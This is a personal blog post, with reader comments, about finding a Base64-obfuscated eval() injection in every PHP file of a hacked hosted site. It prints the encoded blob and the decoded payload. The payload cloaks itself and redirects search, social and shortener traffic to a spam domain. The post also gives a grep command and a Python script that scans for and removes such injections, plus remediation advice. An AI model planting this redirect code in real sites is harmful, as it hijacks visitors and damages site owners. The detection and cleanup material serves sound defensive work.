Damn you Hackers!!! Go to Hell!!!

So today I noticed another hack that has been installed on my machine. I have to say, ever since my move to GoDaddy.com my site has been hacked over and over again. This is number three. The reason I posted about this one is that it is actually pretty interesting, and finding out what was done was like a mystery. So let me tell you a quick story.

So this evening I was trying to figure out how to get my Project 365 page to post automatically to my website. This is when I first noticed a slowdown and an issue while I was using the debugger from Facebook. At first I thought it was the WordPress plugin, but it occasionally works. I got everything ready, posted my first auto post, and strange things started to happen.

As I stated, everything looked normal at first, until I clicked on the links provided by Facebook. When I click on the Facebook link to my website, it goes to some spam site. At first I thought it was the .htaccess hack that I received a while back, but that was not the case. Then I thought maybe it was a DNS hack. That was also not the case. Finally, I found the following in all my .php files on my web server.

It calls eval() on the output of base64_decode(), so the PHP that actually runs is never visible in the file; all that appears is the following Base64 block (shown here line-wrapped as the blog renders it):

DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhl
YWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVS
RVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICgh
c3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Ig
c3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0
cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQu
bHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5k
ZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgi
L2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlz
cGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3Ry
aXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNl
bGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ

It is quite clever. Because it is encoded, people may easily overlook it, but when you decode the text this is what you get:

error_reporting(0);                 // hide any PHP errors the payload itself might cause
$qazplm=headers_sent();
if (!$qazplm){                      // only act if no output has been sent yet, so a Location header can still be emitted
  $referer=$_SERVER['HTTP_REFERER'];
  $uag=$_SERVER['HTTP_USER_AGENT'];
  if ($uag) {
    if (!stristr($uag,"MSIE 7.0")){ // skip Internet Explorer 7
      // fire only when the visitor arrived from a search engine, social network or URL shortener
      if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
        // because of the "or", this only holds back the redirect when the referrer contains both words
        if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
          header("Location: http://minkof.sellclassics.com/"); // send the visitor to the spam site
          exit();
        }
      }
    }
  }
}

Tricky, huh? The conditions also explain why the site looked normal when browsed directly: the redirect only fires when the Referer header names one of the listed search engines, social networks or URL shorteners (which is why the Facebook links were the ones that broke), it skips Internet Explorer 7, and it only sends the Location header if no output has been produced yet, so the code has to run before anything else in the file. Someone who types the URL straight into the address bar, like the site owner, never gets redirected.

So, well... the solution? Remove the injected code from all the .php files. With a little help from grep I was able to locate all the bad code:

grep -H -r 'eval(base64_decode' ./
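The grep above finds the files; the next step is to see what each blob decodes to and then cut it out. The following script is an added example written for this post, not code from the original article: it walks a directory tree for .php files, finds every eval(base64_decode("...")) (tolerating line-wrapped blobs and stripped "=" padding, as in the blob above), decodes the payload, pulls out any header("Location: ...") target, and removes the injected statement. The sample site it builds, the payload it plants and the target domain malicious.example are constructed for the demonstration; the assumption that the injection sits in a PHP tag of its own is also mine.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode("...")) / eval(base64_decode('...')); the blob may be
# line-wrapped and may have its "=" padding stripped, as the one in the post does.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]*?)\1\s*\)\s*\)\s*;?""",
    re.IGNORECASE,
)
# A PHP tag holding nothing but that statement: the whole tag is the injection and
# can be cut out without touching the file's real code (assumed wrapper form).
INJECTED_TAG = re.compile(
    r"""<\?php\s*eval\s*\(\s*base64_decode\s*\(\s*(['"])[A-Za-z0-9+/=\s]*?\1\s*\)\s*\)\s*;?\s*\?>\s*""",
    re.IGNORECASE,
)
# Pulls the target of header("Location: ...") out of the decoded payload.
REDIRECT = re.compile(r"""header\s*\(\s*(['"])Location:\s*([^'"]+)\1""", re.IGNORECASE)


def decode_payload(blob: str) -> str:
    """Decode a possibly line-wrapped, possibly unpadded Base64 blob to text."""
    raw = "".join(blob.split())
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw).decode("utf-8", errors="replace")


def scan_file(path: Path) -> list:
    """One finding per eval(base64_decode(...)) in the file, with the decoded payload."""
    text = path.read_text(errors="replace")
    findings = []
    for m in EVAL_B64.finditer(text):
        decoded = decode_payload(m.group(2))
        findings.append({
            "file": str(path),
            "offset": m.start(),
            "decoded": decoded,
            "redirects": [r.group(2) for r in REDIRECT.finditer(decoded)],
        })
    return findings


def scan_tree(root) -> list:
    """The grep above with decoding added: every .php file under root."""
    return [f for p in sorted(Path(root).rglob("*.php")) for f in scan_file(p)]


def clean_file(path: Path) -> int:
    """Strip the injected statement(s) from one file; returns how many were removed."""
    text = path.read_text(errors="replace")
    cleaned, n_tags = INJECTED_TAG.subn("", text)   # whole injected <?php ... ?> tags first
    cleaned, n_stmts = EVAL_B64.subn("", cleaned)   # then any bare statements left over
    if n_tags or n_stmts:
        path.write_text(cleaned)
    return n_tags + n_stmts


# Constructed sample site (not the blog's files): one infected file, one clean one.
# The payload mimics the shape of the one above, with a hypothetical target domain.
SAMPLE_PAYLOAD = (
    'error_reporting(0);'
    'if(stristr($_SERVER["HTTP_REFERER"],"facebook.com")){'
    'header("Location: http://malicious.example/");exit();}'
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode().rstrip("=")


def build_sample_site() -> Path:
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text(
        '<?php eval(base64_decode("' + SAMPLE_B64 + '")); ?><?php echo "hello"; ?>'
    )
    (root / "wp-content").mkdir()
    (root / "wp-content" / "clean.php").write_text('<?php echo "clean"; ?>')
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for finding in scan_tree(site):
        print(finding["file"], "redirects to", finding["redirects"])
        print(finding["decoded"])
    for php in Path(site).rglob("*.php"):
        removed = clean_file(php)
        if removed:
            print("cleaned", php, removed)
    print("remaining:", scan_tree(site))
```

Point scan_tree() at the web root, read every decoded payload before deleting anything (back the files up first), and treat any finding as hostile: legitimate plugins do sometimes call base64_decode(), but eval() on its output is not something sane code does. Two caveats a practitioner would add: other variants of this injection wrap the payload in gzinflate(), str_rot13() or string concatenation, so a grep for eval(base64_decode alone will miss those, and cleaning the files without closing the entry point (the leaked FTP or blog password, an outdated plugin) just means the same code comes back, which is why the password change mentioned in the comments below matters as much as the cleanup.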

So, Go To Hell You Punk Hackers!!! I hope you guys get busted and become someone’s bitch in prison.

minhsao

Just a guy inside the Mintrix

4 Comments

Rebecca

Wow that’s scary! Are you going to change to a different host? I hope my website never gets hacked!

minhsao

I am on such a good deal with GoDaddy right now that it is very hard for me to change. I will ride this out until the end of my current contract and then move hosts. Meanwhile, I've got to put my degree to some use, right?

Kim

Thank you SO much for posting this. The same thing has been happening to my website, only on Facebook. I am technically challenged, so I need to forward your advice to someone with some knowledge. I do appreciate you posting it though.

minhsao

My advice is to change the password for your blog account ASAP and then start looking for the bad scripts. Your hosting service may have a way to see which files have been changed. If it is only on Facebook, it is probably exactly the same problem that I had.
